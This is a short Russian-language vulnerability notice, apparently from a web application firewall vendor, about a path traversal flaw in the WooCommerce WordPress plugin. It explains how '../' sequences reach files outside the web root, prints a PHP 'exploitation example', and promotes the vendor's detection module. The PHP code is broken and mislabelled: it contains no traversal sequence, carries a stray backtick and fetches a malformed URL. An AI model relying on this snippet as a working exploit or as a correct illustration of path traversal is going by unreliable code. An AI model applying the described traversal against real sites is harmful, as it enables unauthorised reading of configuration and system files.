В популярном плагине CMS WordPress Woo Commerce обнаружена уязвимость «обход каталога» (Path Traversal).
WooCommerce — бесплатный плагин для электронной коммерции, более 3.000.000 активных установок.
При эксплуатации уязвимости Path Traversal атакующий может получить доступ к файлам и каталогам, которые расположены вне пределов, определенных конфигурацией веб-сервера (web root folder). Путем манипулирования переменными, которые указывают на положение файлов, с помощью последовательностей «../» и их вариаций, может быть получен доступ к любым файлам и каталогам, имеющимся в системе, включая исходные коды приложений, конфигурационные и критические системные файлы с ограниченным доступом.
Пример эксплуатации:
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);
$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
$result = file_get_contents_utf8("http://".$woo);
echo $result;
Такие атаки блокируются с помощью сигнатурного анализа. В случае обфускации пейлоада, запрос обрабатывается модулем искусственного интеллекта Nemesida WAF, распознающего аномалию в параметре запроса и позволяющему выявить эксплуатацию уязвимости.